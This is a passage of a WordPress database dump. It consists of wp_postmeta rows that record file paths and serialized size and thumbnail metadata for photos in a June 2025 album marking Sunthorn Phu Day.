}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83239;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21669;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4008,1434,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg\";s:8:\"filesize\";i:204561;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14968;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96066;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7293;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62764;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18704;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4009,1435,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg'),
(4010,1435,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg\";s:8:\"filesize\";i:221179;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12617;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94709;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6498;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59020;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_14-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15354;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4011,1436,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg'),
(4012,1436,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg\";s:8:\"filesize\";i:253642;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13887;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109019;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6952;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67073;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_13-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4013,1437,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg'),
(4014,1437,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg\";s:8:\"filesize\";i:289360;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16358;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127342;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8542;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79300;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_15-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20924;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4015,1438,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg'),
(4016,1438,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg\";s:8:\"filesize\";i:302361;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15788;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131003;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7727;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80717;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_16-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19983;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4017,1439,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg'),
(4018,1439,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg\";s:8:\"filesize\";i:164167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14455;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83614;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7361;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56371;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_17-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17737;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4019,1440,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_18.jpg'),
(4020,1440,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_18.jpg\";s:8:\"filesize\";i:261783;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_18-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14050;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_18-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113521;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7670;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_18-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70516;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_18-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18424;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4021,1441,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_19.jpg'),
(4022,1441,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:721;s:6:\"height\";i:1280;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_19.jpg\";s:8:\"filesize\";i:188360;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_19-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12368;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_19-577x1024.jpg\";s:5:\"width\";i:577;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83320;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7488;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_19-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18098;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4023,1442,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_20.jpg'),
(4024,1442,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_20.jpg\";s:8:\"filesize\";i:276315;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_20-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16074;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_20-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123243;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8107;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_20-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77267;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_20-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20407;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4025,1443,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_21.jpg'),
(4026,1443,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_21.jpg\";s:8:\"filesize\";i:261951;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_21-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15203;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_21-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115523;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7506;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_21-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72938;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_21-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19533;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4027,1444,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_22.jpg');
INSERT INTO `wp_postmeta` VALUES
(4028,1444,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_22.jpg\";s:8:\"filesize\";i:275587;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_22-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15980;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_22-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123003;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7956;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_22-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76622;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_22-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20296;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4029,1445,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_24.jpg'),
(4030,1445,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_24.jpg\";s:8:\"filesize\";i:283410;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_24-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16581;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_24-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127177;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8384;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_24-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80061;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_24-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21290;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4031,1446,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_23.jpg'),
(4032,1446,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_23.jpg\";s:8:\"filesize\";i:288381;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_23-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16627;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_23-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8277;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_23-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80920;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_23-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21496;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
